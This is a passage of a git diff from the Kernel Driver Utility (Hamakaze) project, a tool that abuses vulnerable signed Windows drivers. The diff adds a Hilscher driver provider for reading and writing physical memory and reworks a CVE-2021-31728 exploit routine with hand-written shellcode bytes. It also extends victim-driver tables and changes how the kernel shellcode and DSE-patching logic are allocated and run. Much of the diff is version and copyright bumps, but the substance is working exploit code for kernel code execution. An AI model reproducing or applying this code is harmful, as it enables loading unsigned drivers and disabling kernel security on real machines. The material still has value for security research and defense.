+ + printf_s("[+] Number of pages found: %llu, modified: %llu\r\n", + enumParams.ccPagesFound, + enumParams.ccPagesModified); + + // + // Run shellcode. + // + VpExecutePayload(victimProv, &victimDeviceHandle); + + supPrintfEvent(kduEventInformation, + "[+] DSE patch executed successfully\r\n"); + } + } // diff --git a/Source/Hamakaze/idrv/dbk.cpp b/Source/Hamakaze/idrv/dbk.cpp index eb88912..30f71ab 100644 --- a/Source/Hamakaze/idrv/dbk.cpp +++ b/Source/Hamakaze/idrv/dbk.cpp @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2022 +* (C) COPYRIGHT AUTHORS, 2022 - 2023 * * TITLE: DBK.CPP * -* VERSION: 1.28 +* VERSION: 1.30 * -* DATE: 01 Dec 2022 +* DATE: 20 Mar 2023 * * Cheat Engine's DBK driver routines. * @@ -668,6 +668,9 @@ BOOL DbkMapDriver( bSuccess = FALSE; } + if (pvShellCode) + ScFree(pvShellCode, ScSizeOf(Context->ShellVersion, NULL)); + FUNCTION_LEAVE_MSG(__FUNCTION__); return bSuccess; diff --git a/Source/Hamakaze/idrv/hilscher.cpp b/Source/Hamakaze/idrv/hilscher.cpp new file mode 100644 index 0000000..461bdc3 --- /dev/null +++ b/Source/Hamakaze/idrv/hilscher.cpp @@ -0,0 +1,122 @@ +/******************************************************************************* +* +* (C) COPYRIGHT AUTHORS, 2023 +* +* TITLE: HILSCHER.CPP +* +* VERSION: 1.30 +* +* DATE: 20 Mar 2023 +* +* Hilscher physmem driver routines. +* +* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF +* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED +* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A +* PARTICULAR PURPOSE. +* +*******************************************************************************/ + +#include "global.h" +#include "idrv/hilscher.h" + +/* +* PhmpReadWritePhysicalMemory +* +* Purpose: +* +* Read/Write from physical memory. +* +*/ +BOOL WINAPI PhmpReadWritePhysicalMemory( + _In_ HANDLE DeviceHandle, + _In_ ULONG_PTR PhysicalAddress, + _In_ PVOID Buffer, + _In_ ULONG NumberOfBytes, + _In_ BOOL DoWrite) +{ + DWORD bytesIO = 0; + BOOL bResult; + NTSTATUS ntStatus; + PHYSMEM_MAP_IN request; + + request.ullPhysicalAddress = PhysicalAddress; + request.ulMapSize = NumberOfBytes; + + ntStatus = supCallDriverEx(DeviceHandle, + IOCTL_PHYSMEM_MAP, + &request, + sizeof(request), + &request, + sizeof(request), + NULL); + + if (!NT_SUCCESS(ntStatus)) { + SetLastError(RtlNtStatusToDosError(ntStatus)); + return FALSE; + } + + SetFilePointer(DeviceHandle, 0, NULL, FILE_BEGIN); + + if (DoWrite) + bResult = WriteFile(DeviceHandle, Buffer, NumberOfBytes, &bytesIO, NULL); + else + bResult = ReadFile(DeviceHandle, Buffer, NumberOfBytes, &bytesIO, NULL); + + return bResult; +} + +/* +* PhmReadPhysicalMemory +* +* Purpose: +* +* Read from physical memory. +* +*/ +BOOL WINAPI PhmReadPhysicalMemory( + _In_ HANDLE DeviceHandle, + _In_ ULONG_PTR PhysicalAddress, + _In_ PVOID Buffer, + _In_ ULONG NumberOfBytes) +{ + return PhmpReadWritePhysicalMemory(DeviceHandle, PhysicalAddress, Buffer, NumberOfBytes, FALSE); +} + +/* +* PhmWritePhysicalMemory +* +* Purpose: +* +* Write to physical memory. +* +*/ +BOOL WINAPI PhmWritePhysicalMemory( + _In_ HANDLE DeviceHandle, + _In_ ULONG_PTR PhysicalAddress, + _In_ PVOID Buffer, + _In_ ULONG NumberOfBytes) +{ + return PhmpReadWritePhysicalMemory(DeviceHandle, PhysicalAddress, Buffer, NumberOfBytes, TRUE); +} + +/* +* PhmRegisterDriver +* +* Purpose: +* +* Set physmem access type. +* +*/ +BOOL WINAPI PhmRegisterDriver( + _In_ HANDLE DeviceHandle, + _In_opt_ PVOID Param) +{ + UNREFERENCED_PARAMETER(Param); + + PHYSMEM_ACCESS_IN request; + + request.ulAccessType = PHYSMEM_READWRITE_ACCESS_8BIT; + + return supCallDriver(DeviceHandle, IOCTL_PHYSMEM_SETACCESS, &request, sizeof(request), NULL, 0); +} diff --git a/Source/Hamakaze/idrv/hilscher.h b/Source/Hamakaze/idrv/hilscher.h new file mode 100644 index 0000000..7e871d2 --- /dev/null +++ b/Source/Hamakaze/idrv/hilscher.h @@ -0,0 +1,68 @@ +/******************************************************************************* +* +* (C) COPYRIGHT AUTHORS, 2023 +* +* TITLE: HILSCHER.H +* +* VERSION: 1.30 +* +* DATE: 20 Mar 2023 +* +* HILSCHER physmem driver interface header. +* +* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF +* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED +* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A +* PARTICULAR PURPOSE. +* +*******************************************************************************/ + +#pragma once + +#define PHYSMEM_READWRITE_ACCESS_8BIT 1 //byte +#define PHYSMEM_READWRITE_ACCESS_16BIT 2 //word +#define PHYSMEM_READWRITE_ACCESS_32BIT 3 //dword +#define PHYSMEM_READWRITE_ACCESS_64BIT 4 //qword +#define PHYSMEM_READWRITE_ACCESS_MEMCPY 5 //memcpy + +#define FILE_DEVICE_HILSCHER FILE_DEVICE_UNKNOWN + +#define PHYSMEM_MAP (DWORD)0x900 +#define PHYSMEM_SETACCESS (DWORD)0x901 + +#define IOCTL_PHYSMEM_MAP \ + CTL_CODE(FILE_DEVICE_HILSCHER, PHYSMEM_MAP,\ + METHOD_BUFFERED, FILE_READ_ACCESS | FILE_WRITE_ACCESS) + +#define IOCTL_PHYSMEM_SETACCESS \ + CTL_CODE(FILE_DEVICE_HILSCHER, PHYSMEM_SETACCESS,\ + METHOD_BUFFERED, FILE_READ_ACCESS | FILE_WRITE_ACCESS) + +// +// Hilscher HW driver interface. +// + +typedef struct _PHYSMEM_ACCESS_IN { + ULONG ulAccessType; +} PHYSMEM_ACCESS_IN, * PPHYSMEM_ACCESS_IN; + +typedef struct _PHYSMEM_MAP_IN { + ULONGLONG ullPhysicalAddress; + ULONG ulMapSize; +} PHYSMEM_MAP_IN, * PPHYSMEM_MAP_IN; + +BOOL WINAPI PhmReadPhysicalMemory( + _In_ HANDLE DeviceHandle, + _In_ ULONG_PTR PhysicalAddress, + _In_ PVOID Buffer, + _In_ ULONG NumberOfBytes); + +BOOL WINAPI PhmWritePhysicalMemory( + _In_ HANDLE DeviceHandle, + _In_ ULONG_PTR PhysicalAddress, + _In_ PVOID Buffer, + _In_ ULONG NumberOfBytes); + +BOOL WINAPI PhmRegisterDriver( + _In_ HANDLE DeviceHandle, + _In_opt_ PVOID Param); diff --git a/Source/Hamakaze/idrv/procexp.cpp b/Source/Hamakaze/idrv/procexp.cpp index fbec003..ebee86a 100644 --- a/Source/Hamakaze/idrv/procexp.cpp +++ b/Source/Hamakaze/idrv/procexp.cpp @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2022 +* (C) COPYRIGHT AUTHORS, 2022 - 2023 * * TITLE: PROCEXP.CPP * -* VERSION: 1.20 +* VERSION: 1.30 * -* DATE: 08 Feb 2022 +* DATE: 20 Mar 2023 * * Process Explorer driver routines. * @@ -24,13 +24,16 @@ HANDLE g_PexPhysicalMemorySection = NULL; static KDU_VICTIM_PROVIDER g_ProcExpVictimSelf{ (LPCWSTR)PROCEXP152, // Device and driver name - (LPCWSTR)PROCEXP_DESC, // Description - IDR_PROCEXP, // Resource id in drivers database - GENERIC_READ | GENERIC_WRITE, // Desired access flags used for acquiring victim handle + (LPCWSTR)PROCEXP1627_DESC, // Description + IDR_PROCEXP1627, // Resource id in drivers database + KDU_VICTIM_PE1627, // Victim id + SYNCHRONIZE | GENERIC_READ | GENERIC_WRITE, // Desired access flags used for acquiring victim handle KDU_VICTIM_FLAGS_NONE, // Victim flags, target dependent VpCreateFromExistingCallback, // Victim create callback VpReleaseCallbackStub, // Victim release callback - VpExecuteFromExistingCallback // Victim execute payload callback + VpExecuteFromExistingCallback, // Victim execute payload callback + &g_ProcExpSig, // Victim dispatch bytes + sizeof(g_ProcExpSig) // Victim dispatch bytes size }; /* diff --git a/Source/Hamakaze/idrv/winring0.cpp b/Source/Hamakaze/idrv/winring0.cpp index d203ef6..0fe28c6 100644 --- a/Source/Hamakaze/idrv/winring0.cpp +++ b/Source/Hamakaze/idrv/winring0.cpp @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2020 - 2022 +* (C) COPYRIGHT AUTHORS, 2020 - 2023 * * TITLE: WINRING0.CPP * -* VERSION: 1.27 +* VERSION: 1.30 * -* DATE: 08 Nov 2022 +* DATE: 20 Mar 2023 * * WinRing0 based drivers routines. * diff --git a/Source/Hamakaze/idrv/zemana.cpp b/Source/Hamakaze/idrv/zemana.cpp index ed9ae09..e36f0fe 100644 --- a/Source/Hamakaze/idrv/zemana.cpp +++ b/Source/Hamakaze/idrv/zemana.cpp @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2022 +* (C) COPYRIGHT AUTHORS, 2022 - 2023 * * TITLE: ZEMANA.CPP * -* VERSION: 1.28 +* VERSION: 1.30 * -* DATE: 01 Dec 2022 +* DATE: 20 Mar 2023 * * Zemana driver routines. * @@ -52,7 +52,7 @@ typedef struct _ZM_SCSI_ACCESS { } ZM_SCSI_ACCESS, * PZM_SCSI_ACCESS; typedef struct _ZM_SCSI_MINIPORT_FIX { - CHAR DriverName[260]; + CHAR DriverName[MAX_PATH]; ULONG32 Offset_Func1; UCHAR FixCode_Func1[128]; ULONG32 Offset_Func2; @@ -268,20 +268,37 @@ BOOL ZmExploit_CVE2021_31728( printf_s("[+] Stager shellCode allocated at 0x%llX\r\n", kernelShellCode); + CHAR szDriverName[MAX_PATH]; + + RtlSecureZeroMemory(&szDriverName, sizeof(szDriverName)); + + // // Trigger shellcode. // - ZM_SCSI_MINIPORT_FIX MiniportFix = { - "ZemanaAntimalware.sys", - 0xD553, //driver specific offset, correct it for another sample - { - 0x48, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // mov rax, imm64 - 0x80, 0x05, 0x01, 0x00, 0x00, 0x00, 0x10, // add byte ptr [rip+0], 0x10 - 0xFF, 0xC0, // inc eax -> call rax (after the self-modifying) - 0xEB, 0x00 // jmp rel8 - } + ZM_SCSI_MINIPORT_FIX MiniportFix; + ANSI_STRING drvFileName; + + RtlSecureZeroMemory(&MiniportFix, sizeof(MiniportFix)); + + drvFileName.Buffer = NULL; + drvFileName.Length = drvFileName.MaximumLength = 0; + + ntsupConvertToAnsi(Context->Provider->LoadData->DriverName, &drvFileName); + + StringCchPrintfA(MiniportFix.DriverName, MAX_PATH, "%s.sys", drvFileName.Buffer); + + MiniportFix.Offset_Func1 = 0xD553; //driver specific offset, correct it for another sample + + BYTE patchCode[] = + { 0x48, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // mov rax, imm64 + 0x80, 0x05, 0x01, 0x00, 0x00, 0x00, 0x10, // add byte ptr [rip+0], 0x10 + 0xFF, 0xC0, // inc eax -> call rax (after the self-modifying) + 0xEB, 0x00 // jmp rel8 }; + RtlCopyMemory(MiniportFix.FixCode_Func1, patchCode, sizeof(patchCode)); + // // Point the call to it. // @@ -354,36 +371,50 @@ BOOL ZmMapDriver( do { if (VpCreate(victimProv, Context->ModuleBase, - &victimDeviceHandle)) + &victimDeviceHandle, + NULL, + NULL)) { - printf_s("[+] Victim is accepted, handle 0x%p\r\n", victimDeviceHandle); + printf_s("[+] Victim is loaded, handle 0x%p\r\n", victimDeviceHandle); } else { supPrintfEvent(kduEventError, - "[!] Could not accept victim target, GetLastError %lu\r\n", GetLastError()); + "[!] Could not load victim target, GetLastError %lu\r\n", GetLastError()); } - PRTL_PROCESS_MODULE_INFORMATION target; - PRTL_PROCESS_MODULES modulesList = (PRTL_PROCESS_MODULES)supGetLoadedModulesList(FALSE, NULL); - if (modulesList) { + VICTIM_DRIVER_INFORMATION vdi; - target = (PRTL_PROCESS_MODULE_INFORMATION)ntsupFindModuleEntryByName(modulesList, "procexp152.sys"); - if (target) { - dispatchAddress = (ULONG_PTR)target->ImageBase; - } + RtlSecureZeroMemory(&vdi, sizeof(vdi)); - supHeapFree(modulesList); + if (!VpQueryInformation(Context->Victim, VictimDriverInformation, &vdi, sizeof(vdi))) { + supPrintfEvent(kduEventError, + "[!] Could not query victim driver information, GetLastError %lu\r\n", GetLastError()); + break; } + dispatchAddress = vdi.LoadedImageBase; + if (dispatchAddress == 0) { supPrintfEvent(kduEventError, "[!] Could not query victim target\r\n"); break; } + + VICTIM_IMAGE_INFORMATION vi; + + RtlSecureZeroMemory(&vi, sizeof(vi)); + + if (!VpQueryInformation( + Context->Victim, VictimImageInformation, &vi, sizeof(vi))) + { + supPrintfEvent(kduEventError, + "[!] Could not query victim image information, GetLastError %lu\r\n", GetLastError()); + break; + } - dispatchAddress += PE152_DISPATCH_OFFSET; + dispatchAddress += vi.DispatchOffset; printf_s("[+] Victim target 0x%llX\r\n", dispatchAddress); diff --git a/Source/Hamakaze/kduplist.h b/Source/Hamakaze/kduplist.h index 8ed591f..2c79e6c 100644 --- a/Source/Hamakaze/kduplist.h +++ b/Source/Hamakaze/kduplist.h @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2020 - 2022 +* (C) COPYRIGHT AUTHORS, 2020 - 2023 * * TITLE: KDUPLIST.H * -* VERSION: 1.28 +* VERSION: 1.30 * -* DATE: 02 Dec 2022 +* DATE: 20 Mar 2023 * * Providers global list. * @@ -39,6 +39,7 @@ #include "idrv/asrdrv.h" #include "idrv/alcpu.h" #include "idrv/ryzen.h" +#include "idrv/hilscher.h" // // Victims public array. @@ -46,14 +47,32 @@ static KDU_VICTIM_PROVIDER g_KDUVictims[] = { { (LPCWSTR)PROCEXP152, // Device and driver name, - (LPCWSTR)PROCEXP_DESC, // Description - IDR_PROCEXP, // Resource id in drivers database - GENERIC_READ | GENERIC_WRITE, // Desired access flags used for acquiring victim handle + (LPCWSTR)PROCEXP1627_DESC, // Description + IDR_PROCEXP1627, // Resource id in drivers database + KDU_VICTIM_PE1627, // Victim id + SYNCHRONIZE | GENERIC_READ | GENERIC_WRITE, // Desired access flags used for acquiring victim handle KDU_VICTIM_FLAGS_SUPPORT_RELOAD, // Victim flags, target dependent VpCreateCallback, // Victim create callback VpReleaseCallback, // Victim release callback - VpExecuteCallback // Victim execute payload callback + VpExecuteCallback, // Victim execute payload callback + & g_ProcExpSig, // Victim dispatch bytes + sizeof(g_ProcExpSig) // Victim dispatch bytes size + }, + + { + (LPCWSTR)PROCEXP152, // Device and driver name, + (LPCWSTR)PROCEXP1702_DESC, // Description + IDR_PROCEXP1702, // Resource id in drivers database + KDU_VICTIM_PE1702, // Victim id + SYNCHRONIZE | GENERIC_READ | GENERIC_WRITE, // Desired access flags used for acquiring victim handle + KDU_VICTIM_FLAGS_SUPPORT_RELOAD, // Victim flags, target dependent + VpCreateCallback, // Victim create callback + VpReleaseCallback, // Victim release callback + VpExecuteCallback, // Victim execute payload callback + & g_ProcExpSig, // Victim dispatch bytes + sizeof(g_ProcExpSig) // Victim dispatch bytes size } + }; // @@ -743,7 +762,7 @@ static KDU_PROVIDER g_KDUProviders[] = (provUnregisterDriver)NULL, (provPreOpenDriver)NULL, (provPostOpenDriver)KDUProviderPostOpen, - (provMapDriver)KDUMapDriver2, + (provMapDriver)KDUMapDriver, (provControlDSE)KDUControlDSE2, (provReadKernelVM)NULL, @@ -767,7 +786,7 @@ static KDU_PROVIDER g_KDUProviders[] = (provUnregisterDriver)NULL, (provPreOpenDriver)NULL, (provPostOpenDriver)KDUProviderPostOpen, - (provMapDriver)KDUMapDriver2, + (provMapDriver)KDUMapDriver, (provControlDSE)KDUControlDSE2, (provReadKernelVM)NULL, @@ -791,7 +810,7 @@ static KDU_PROVIDER g_KDUProviders[] = (provUnregisterDriver)NULL, (provPreOpenDriver)NULL, (provPostOpenDriver)KDUProviderPostOpen, - (provMapDriver)KDUMapDriver2, + (provMapDriver)KDUMapDriver, (provControlDSE)KDUControlDSE2, (provReadKernelVM)NULL, @@ -803,6 +822,30 @@ static KDU_PROVIDER g_KDUProviders[] = (provWritePhysicalMemory)RmWritePhysicalMemory, (provValidatePrerequisites)RmValidatePrerequisites + }, + + { + NULL, + + (provStartVulnerableDriver)KDUProvStartVulnerableDriver, + (provStopVulnerableDriver)KDUProvStopVulnerableDriver, + + (provRegisterDriver)PhmRegisterDriver, + (provUnregisterDriver)NULL, + (provPreOpenDriver)NULL, + (provPostOpenDriver)KDUProviderPostOpen, + (provMapDriver)KDUMapDriver, + (provControlDSE)KDUControlDSE2, + + (provReadKernelVM)NULL, + (provWriteKernelVM)NULL, + + (provVirtualToPhysical)NULL, + (provQueryPML4)NULL, + (provReadPhysicalMemory)PhmReadPhysicalMemory, + (provWritePhysicalMemory)PhmWritePhysicalMemory, + + (provValidatePrerequisites)NULL } }; diff --git a/Source/Hamakaze/kduprov.cpp b/Source/Hamakaze/kduprov.cpp index 2a34784..74a5ec6 100644 --- a/Source/Hamakaze/kduprov.cpp +++ b/Source/Hamakaze/kduprov.cpp @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2020 - 2022 +* (C) COPYRIGHT AUTHORS, 2020 - 2023 * * TITLE: KDUPROV.CPP * -* VERSION: 1.28 +* VERSION: 1.30 * -* DATE: 01 Dec 2022 +* DATE: 20 Mar 2023 * * Vulnerable drivers provider abstraction layer. * @@ -373,8 +373,8 @@ void KDUProvOpenVulnerableDriverAndRunCallbacks( } NTSTATUS ntStatus = supOpenDriver(Context->Provider->LoadData->DeviceName, - WRITE_DAC | GENERIC_WRITE | GENERIC_READ, - &deviceHandle); + SYNCHRONIZE | WRITE_DAC | GENERIC_WRITE | GENERIC_READ, + &deviceHandle); if (!NT_SUCCESS(ntStatus)) { @@ -512,7 +512,7 @@ BOOL WINAPI KDUProviderPostOpen( deviceHandle, NtCurrentProcess(), &strHandle, - GENERIC_WRITE | GENERIC_READ, + SYNCHRONIZE | GENERIC_WRITE | GENERIC_READ, 0, 0))) { @@ -1002,7 +1002,9 @@ PKDU_CONTEXT WINAPI KDUProviderCreate( Context->Victim = NULL; } else { - Context->Victim = &g_KDUVictims[KDU_VICTIM_DEFAULT]; + if (prov->LoadData->VictimId >= KDU_VICTIM_MAX) + prov->LoadData->VictimId = KDU_VICTIM_DEFAULT; + Context->Victim = &g_KDUVictims[prov->LoadData->VictimId]; } PUNICODE_STRING CurrentDirectory = &NtCurrentPeb()->ProcessParameters->CurrentDirectory.DosPath; diff --git a/Source/Hamakaze/kduprov.h b/Source/Hamakaze/kduprov.h index 399f5cf..255d4ff 100644 --- a/Source/Hamakaze/kduprov.h +++ b/Source/Hamakaze/kduprov.h @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2014 - 2022 +* (C) COPYRIGHT AUTHORS, 2014 - 2023 * * TITLE: KDUPROV.H * -* VERSION: 1.28 +* VERSION: 1.30 * -* DATE: 02 Dec 2022 +* DATE: 20 Mar 2023 * * Provider support routines. * @@ -19,14 +19,6 @@ #pragma once -// -// Victim providers id -// -#define KDU_VICTIM_PROCEXP 0 - -#define KDU_PROVIDER_DEFAULT KDU_PROVIDER_INTEL_NAL -#define KDU_VICTIM_DEFAULT KDU_VICTIM_PROCEXP - // // Providers abstraction interface. // @@ -220,13 +212,22 @@ typedef struct _KDU_CONTEXT { typedef struct _KDU_PHYSMEM_ENUM_PARAMS { _In_ BOOL bWrite; + _In_ HANDLE DeviceHandle; + _In_ provReadPhysicalMemory ReadPhysicalMemory; + _In_ provWritePhysicalMemory WritePhysicalMemory; + _In_opt_ PVOID pvPayload; _In_opt_ ULONG cbPayload; _Out_ SIZE_T ccPagesFound; _Out_ SIZE_T ccPagesModified; - _In_ PKDU_CONTEXT Context; + _In_ ULONG DispatchHandlerOffset; + _In_ ULONG DispatchHandlerPageOffset; + _In_ PVOID DispatchSignature; + _In_ ULONG DispatchSignatureLength; + _In_ ULONG JmpAddress; + } KDU_PHYSMEM_ENUM_PARAMS, * PKDU_PHYSMEM_ENUM_PARAMS; ULONG KDUProvGetCount(); diff --git a/Source/Hamakaze/main.cpp b/Source/Hamakaze/main.cpp index e551d1c..f81a823 100644 --- a/Source/Hamakaze/main.cpp +++ b/Source/Hamakaze/main.cpp @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2020 - 2022 +* (C) COPYRIGHT AUTHORS, 2020 - 2023 * * TITLE: MAIN.CPP * -* VERSION: 1.28 +* VERSION: 1.30 * -* DATE: 01 Dec 2022 +* DATE: 20 Mar 2023 * * Hamakaze main logic and entrypoint. * @@ -523,7 +523,7 @@ int KDUMain() OSVERSIONINFO osv; #ifdef _DEBUG - printf_s("[*] Debug Mode Run\r\n"); + printf_s("[*] Debug Mode Run, several features (like a shellcode proper generation) will be unavailable\r\n"); #endif FUNCTION_ENTER_MSG(__FUNCTION__); @@ -640,7 +640,7 @@ VOID KDUIntroBanner() { IMAGE_NT_HEADERS* ntHeaders = RtlImageNtHeader(NtCurrentPeb()->ImageBaseAddress); - printf_s("[#] Kernel Driver Utility v%lu.%lu.%lu (build %lu) started, (c)2020 - 2022 KDU Project\r\n"\ + printf_s("[#] Kernel Driver Utility v%lu.%lu.%lu (build %lu) started, (c)2020 - 2023 KDU Project\r\n"\ "[#] Build at %s, header checksum 0x%lX\r\n"\ "[#] Supported x64 OS : Windows 7 and above\r\n", KDU_VERSION_MAJOR, diff --git a/Source/Hamakaze/res/SB_SMBUS_SDK.bin b/Source/Hamakaze/res/SB_SMBUS_SDK.bin index 2ff5b5052e636302f7ceb7e8e74a4f35e0e9dead..60a7278ed03d7023840bf2a0d2320b5c37099246 100644 GIT binary patch delta 21 dcmcb6p6Tv+CNBH={ho^w4=z`d*vNHxIRJ313HJa1 delta 21 dcmcb6p6Tv+CNBH={hpV;_G_?vZsfYW8~}3)3LpRg diff --git a/Source/Hamakaze/res/Taigei32.bin b/Source/Hamakaze/res/Taigei32.bin index ea679b8849b28c3b444d4cadd1b14d218a13548d..eaa599502044e9d0719f97c11dcafccf2d9565e7 100644 GIT binary patch delta 19 acmdldvQLD|ety4aQSSNWN)j8nOt=6`PX_G( delta 19 acmdldvQLD|ety5_CaxY0cF&DmCR_kT76u*w diff --git a/Source/Hamakaze/resource.rc b/Source/Hamakaze/resource.rc index 9e6f0bd..3eae5a1 100644 --- a/Source/Hamakaze/resource.rc +++ b/Source/Hamakaze/resource.rc @@ -51,8 +51,8 @@ END // VS_VERSION_INFO VERSIONINFO - FILEVERSION 1,2,8,2212 - PRODUCTVERSION 1,2,8,2212 + FILEVERSION 1,3,0,2303 + PRODUCTVERSION 1,3,0,2303 FILEFLAGSMASK 0x3fL #ifdef _DEBUG FILEFLAGS 0x1L @@ -69,12 +69,12 @@ BEGIN BEGIN VALUE "CompanyName", "UG North" VALUE "FileDescription", "Kernel Driver Utility" - VALUE "FileVersion", "1.2.8.2212" + VALUE "FileVersion", "1.3.0.2303" VALUE "InternalName", "Hamakaze.exe" - VALUE "LegalCopyright", "Copyright (C) 2020 - 2022 KDU Project" + VALUE "LegalCopyright", "Copyright (C) 2020 - 2023 KDU Project" VALUE "OriginalFilename", "Hamakaze.exe" VALUE "ProductName", "KDU" - VALUE "ProductVersion", "1.2.8.2212" + VALUE "ProductVersion", "1.3.0.2303" END END BLOCK "VarFileInfo" diff --git a/Source/Hamakaze/shellcode.cpp b/Source/Hamakaze/shellcode.cpp index 00ad75e..8d9a08d 100644 --- a/Source/Hamakaze/shellcode.cpp +++ b/Source/Hamakaze/shellcode.cpp @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2020 - 2022 +* (C) COPYRIGHT AUTHORS, 2020 - 2023 * * TITLE: SHELLCODE.CPP * -* VERSION: 1.27 +* VERSION: 1.30 * -* DATE: 16 Oct 2022 +* DATE: 20 Mar 2023 * * Default driver mapping shellcode(s) implementation. * @@ -1328,8 +1328,8 @@ typedef VOID(NTAPI* pfnScLoaderRoutine)( * */ NTSTATUS NTAPI ScDispatchRoutineDebugSelector( - _In_ ULONG ShellVersion, - _In_ PVOID ShellPtr, + _In_ ULONG ScVersion, + _In_ PVOID ScBuffer, _In_ struct _DEVICE_OBJECT* DeviceObject, _Inout_ struct _IRP* Irp) { @@ -1338,7 +1338,7 @@ NTSTATUS NTAPI ScDispatchRoutineDebugSelector( pfnScLoaderRoutine LoaderRoutine; } Routine; - switch (ShellVersion) { + switch (ScVersion) { case KDU_SHELLCODE_V4: Routine.LoaderRoutine = (pfnScLoaderRoutine)ScLoaderRoutineV1; break; @@ -1354,12 +1354,12 @@ NTSTATUS NTAPI ScDispatchRoutineDebugSelector( break; } - switch (ShellVersion) { + switch (ScVersion) { case KDU_SHELLCODE_V4: - Routine.LoaderRoutine(ShellPtr); + Routine.LoaderRoutine(ScBuffer); return STATUS_SUCCESS; default: - return Routine.DispatchRoutine(DeviceObject, Irp, ShellPtr); + return Routine.DispatchRoutine(DeviceObject, Irp, ScBuffer); } } @@ -1431,14 +1431,14 @@ ULONG_PTR ScResolveFunctionByName( * */ SIZE_T ScGetViewSize( - _In_ ULONG ShellVersion, - _In_ PVOID ShellCodePtr + _In_ ULONG ScVersion, + _In_ PVOID ScBuffer ) { SIZE_T viewSize; - PSHELLCODE pvShellCode = (PSHELLCODE)ShellCodePtr; + PSHELLCODE pvShellCode = (PSHELLCODE)ScBuffer; - switch (ShellVersion) { + switch (ScVersion) { case KDU_SHELLCODE_V4: case KDU_SHELLCODE_V3: case KDU_SHELLCODE_V2: @@ -1460,28 +1460,28 @@ SIZE_T ScGetViewSize( * */ DWORD ScSizeOf( - _In_ ULONG ShellVersion, + _In_ ULONG ScVersion, _Out_opt_ PULONG PayloadSize ) { ULONG payloadSize; - switch (ShellVersion) { - case KDU_SHELLCODE_V3: - payloadSize = sizeof(PAYLOAD_HEADER_V3); - break; - case KDU_SHELLCODE_V2: - payloadSize = sizeof(PAYLOAD_HEADER_V2); - break; - case KDU_SHELLCODE_V4: - case KDU_SHELLCODE_V1: - default: - payloadSize = sizeof(PAYLOAD_HEADER_V1); - break; - } - - if (PayloadSize) + if (PayloadSize) { + switch (ScVersion) { + case KDU_SHELLCODE_V3: + payloadSize = sizeof(PAYLOAD_HEADER_V3); + break; + case KDU_SHELLCODE_V2: + payloadSize = sizeof(PAYLOAD_HEADER_V2); + break; + case KDU_SHELLCODE_V4: + case KDU_SHELLCODE_V1: + default: + payloadSize = sizeof(PAYLOAD_HEADER_V1); + break; + } *PayloadSize = payloadSize; + } return sizeof(SHELLCODE); } @@ -1495,13 +1495,13 @@ DWORD ScSizeOf( * */ BOOL ScBuildShellImportDebug( - _In_ ULONG ShellVersion, - _In_ PVOID ShellPtr + _In_ ULONG ScVersion, + _In_ PVOID ScBuffer ) { - SHELLCODE* ShellCode = (SHELLCODE*)ShellPtr; + SHELLCODE* ShellCode = (SHELLCODE*)ScBuffer; - switch (ShellVersion) { + switch (ScVersion) { case KDU_SHELLCODE_V4: case KDU_SHELLCODE_V3: @@ -1535,8 +1535,8 @@ BOOL ScBuildShellImportDebug( * */ BOOL ScBuildShellImport( - _In_ ULONG ShellVersion, - _In_ PVOID ShellPtr, + _In_ ULONG ScVersion, + _In_ PVOID ScBuffer, _In_ ULONG_PTR KernelBase, _In_ ULONG_PTR KernelImage ) @@ -1545,7 +1545,7 @@ BOOL ScBuildShellImport( ULONG i; - SHELLCODE* ShellCode = (SHELLCODE*)ShellPtr; + SHELLCODE* ShellCode = (SHELLCODE*)ScBuffer; #ifdef ENABLE_DBGPRINT pfnDbgPrint DbgPrintPtr; @@ -1564,7 +1564,7 @@ BOOL ScBuildShellImport( "KeSetEvent" }; - UNREFERENCED_PARAMETER(ShellVersion); + UNREFERENCED_PARAMETER(ScVersion); do { @@ -1619,16 +1619,16 @@ BOOL ScBuildShellImport( * */ HANDLE ScCreateReadyEvent( - _In_ ULONG ShellVersion, - _In_ PVOID ShellPtr + _In_ ULONG ScVersion, + _In_ PVOID ScBuffer ) { HANDLE hReadyEvent; - SHELLCODE* ShellCode = (SHELLCODE*)ShellPtr; + SHELLCODE* ShellCode = (SHELLCODE*)ScBuffer; hReadyEvent = CreateEvent(NULL, TRUE, FALSE, NULL); - switch (ShellVersion) { + switch (ScVersion) { case KDU_SHELLCODE_V4: case KDU_SHELLCODE_V3: case KDU_SHELLCODE_V2: @@ -1748,10 +1748,12 @@ BOOLEAN ScStoreVersionSpecificData( * */ VOID ScFree( - _In_ PVOID ShellPtr + _In_ PVOID ScBuffer, + _In_ ULONG ScSize ) { - VirtualFree(ShellPtr, 0, MEM_RELEASE); + VirtualUnlock(ScBuffer, ScSize); + VirtualFree(ScBuffer, 0, MEM_RELEASE); } /* @@ -1806,7 +1808,7 @@ PVOID ScAllocate( _Out_ PULONG ShellSize ) { - SIZE_T scSize; + DWORD scSize; PSHELLCODE pvShellCode = NULL; PVOID pvBootstrap; @@ -1855,6 +1857,11 @@ PVOID ScAllocate( if (pvShellCode == NULL) return NULL; + if (!VirtualLock(pvShellCode, scSize)) { + VirtualFree(pvShellCode, 0, MEM_RELEASE); + return NULL; + } + pvBootstrap = pvShellCode->BootstrapCode; switch (ShellVersion) { @@ -1873,7 